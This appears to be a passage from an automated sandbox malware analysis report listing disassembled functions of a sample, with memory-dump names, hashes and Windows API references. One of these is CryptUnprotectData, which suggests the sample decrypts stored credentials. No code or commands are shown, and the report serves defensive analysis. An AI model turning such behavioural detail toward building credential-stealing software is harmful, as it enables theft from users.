                                  Function 00E4748A Relevance: 5.4, Strings: 3, Instructions: 1653COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: ](?w$t_H$${o/
                                  • API String ID: 0-3858438325
                                  • Opcode ID: 91cc20d367abdaa2aa0e339b8777069f9b6457bb7e1571dc0e100fb386c010dc
                                  • Instruction ID: a1887935dada14b8057e7a2711c245ce926daa4e1d47c6b288337d22d26bc009
                                  • Opcode Fuzzy Hash: 91cc20d367abdaa2aa0e339b8777069f9b6457bb7e1571dc0e100fb386c010dc
                                  • Instruction Fuzzy Hash: 9EB22BF3A0C204AFE3046E2DDC8567BB7D9EF94720F1A463DEAC5C3744EA3598018696
                                  Function 00A83720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CoCreateInstance.COMBASE(00A8E118,00000000,00000001,00A8E108,00000000), ref: 00A83758
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00A837B0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharCreateInstanceMultiWide
                                  • String ID:
                                  • API String ID: 123533781-0
                                  • Opcode ID: 61f169c0aae62fd1685a601dd2ca9de5969c4ab6bea57e0f2db1b0a30b5e2ba0
                                  • Instruction ID: 0bda2a2acd02cd89e98b0ca2a4163d4a00962c1042119f39953d026e328d96d3
                                  • Opcode Fuzzy Hash: 61f169c0aae62fd1685a601dd2ca9de5969c4ab6bea57e0f2db1b0a30b5e2ba0
                                  • Instruction Fuzzy Hash: 4441E971A40A28AFDB24DF58CC95B9BB7B5BB48702F4042D8E609E72D0D7716E85CF50
                                  Function 00A79B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00A79B84
                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 00A79BA3
                                  • LocalFree.KERNEL32(?), ref: 00A79BD3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Local$AllocCryptDataFreeUnprotect
                                  • String ID:
                                  • API String ID: 2068576380-0
                                  • Opcode ID: c2e5ef6dc34f7f3120307aa8d0e3befdeff0bc0a0d45fe4266b0f16a8633f95e
                                  • Instruction ID: 3302380084635085737e49d240de51142285a22f0e8883f7c8f21ea054c6d8ef
                                  • Opcode Fuzzy Hash: c2e5ef6dc34f7f3120307aa8d0e3befdeff0bc0a0d45fe4266b0f16a8633f95e
                                  • Instruction Fuzzy Hash: C0110CB8A00209EFCB04DF94D995AAE77B5FF89300F108599E915A7350D770AE10CF61
                                  Function 00E3AD7B Relevance: 1.5, Strings: 1, Instructions: 251COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: Cw
                                  • API String ID: 0-3441118413
                                  • Opcode ID: 63b95dd45f994a0ed9eddd7c46e0473990d19410431665c121f949bc02c34352
                                  • Instruction ID: dbca6789d42a084c6d7067560d5bb34c77b11a67d4ca765aa90f35922088be64
                                  • Opcode Fuzzy Hash: 63b95dd45f994a0ed9eddd7c46e0473990d19410431665c121f949bc02c34352
                                  • Instruction Fuzzy Hash: 0F7159B350C3089FD304BE3CEC8967ABBE5EB54620F1A4A3DEAC4C7744F93588018696
                                  Function 00DD79A5 Relevance: 1.5, Strings: 1, Instructions: 242COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: >)w{
                                  • API String ID: 0-2709875300
                                  • Opcode ID: 41457d7b6ceb30dc5b9ef363106edd3b2bd39be8664a5b370752bc7596d54a27
                                  • Instruction ID: 41c5bc46b6b6eebed870b6e1188e7915b226e4f7b9bd9cf701a1a0a847e9ed09
                                  • Opcode Fuzzy Hash: 41457d7b6ceb30dc5b9ef363106edd3b2bd39be8664a5b370752bc7596d54a27
                                  • Instruction Fuzzy Hash: E47127F3E082109FF7046E28DC5977AB7D6EB94320F1B453DEAC997784E939580482C6
                                  Function 00D9AC80 Relevance: 1.4, Strings: 1, Instructions: 183COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: P{
                                  • API String ID: 0-277153622
                                  • Opcode ID: 71d2fa1c7cc079b532a2336bfa6d31c8f4764662ed5955f275fa9ab9a4ce4966
                                  • Instruction ID: 4bdb0ae63c397590f842715dd69440aa241849895920ab4a51c22754d51e4e93
                                  • Opcode Fuzzy Hash: 71d2fa1c7cc079b532a2336bfa6d31c8f4764662ed5955f275fa9ab9a4ce4966
                                  • Instruction Fuzzy Hash: 09513BF3E081145FE3056939DD597BA7ADADBA4330F2F463DE988D3784F93958054282
                                  Function 00EC5881 Relevance: 1.4, Strings: 1, Instructions: 160COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: u:
                                  • API String ID: 0-2697468514
                                  • Opcode ID: c4ab98798dd85a89186df02ee6ae38baf90341f122a7179dbe031901a2751410
                                  • Instruction ID: 27512c137548df98037cc3ec7d18d817480b93a193418fe770b4aae49df77820
                                  • Opcode Fuzzy Hash: c4ab98798dd85a89186df02ee6ae38baf90341f122a7179dbe031901a2751410
                                  • Instruction Fuzzy Hash: 215147B390C2049BE708BA2D9C655BEB7E5EB94320F1A053DE9CA83740EA315811C783
                                  Function 00D80C5F Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: yWso
                                  • API String ID: 0-2275368643
                                  • Opcode ID: cceacbc661aeb05de6574cee43f44814c15b68df4a5f1dc99d639701ce804d53
                                  • Instruction ID: 53751a3bf329c515d8182f86230068e957975dc79d716f08645ecad7ae003d12
                                  • Opcode Fuzzy Hash: cceacbc661aeb05de6574cee43f44814c15b68df4a5f1dc99d639701ce804d53
                                  • Instruction Fuzzy Hash: DD31E7F3A082009FF305AD29DC857BBBBD6DBD4320F1AC53DD694C7784E93999018696
                                  Function 00DAC598 Relevance: .3, Instructions: 259COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2e3d58e8b2003363e4f5ed7a1c3918a681d4301846ea30d60dd4b2c2a6c929ad
                                  • Instruction ID: ca840b780b4fee2faed481c978d31fd5feb4ae4ae18c07779426115473fbab6d
                                  • Opcode Fuzzy Hash: 2e3d58e8b2003363e4f5ed7a1c3918a681d4301846ea30d60dd4b2c2a6c929ad
                                  • Instruction Fuzzy Hash: 708127F3A082109FE3445A2ADC8477AF7EAEFD4724F2B853EDA8497780D97548018692
                                  Function 00D0B34D Relevance: .2, Instructions: 197COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7bda07d0d3d50ecb13946e1e17a9abd60ff97dd357e7253f196b3b451ab5abdd
                                  • Instruction ID: fbb3372aee5998f92ca51aa7ec6fc9951d0e957df870cd7e097cb27b7d23587d
                                  • Opcode Fuzzy Hash: 7bda07d0d3d50ecb13946e1e17a9abd60ff97dd357e7253f196b3b451ab5abdd
                                  • Instruction Fuzzy Hash: C1513CF3A182045FE3509E7CDDC4766BADAEB84320F27463DEA84D3784E57988008692
                                  Function 00D3BF5E Relevance: .2, Instructions: 182COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 54b5eee4e8269cf97b5df799edd9d16f6ff46fb9e93a749ce145d1a7b5af94f4
                                  • Instruction ID: 1d6346677980a5895b270129054e060048d62b463cd4494adbafbafbcb4fdf9d
                                  • Opcode Fuzzy Hash: 54b5eee4e8269cf97b5df799edd9d16f6ff46fb9e93a749ce145d1a7b5af94f4
                                  • Instruction Fuzzy Hash: EC5116F3A0C6145BE3146A19EC45B6AB7E5EF94720F0B453DEAC893780EA3A59048787
                                  Function 00D38DA2 Relevance: .2, Instructions: 180COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
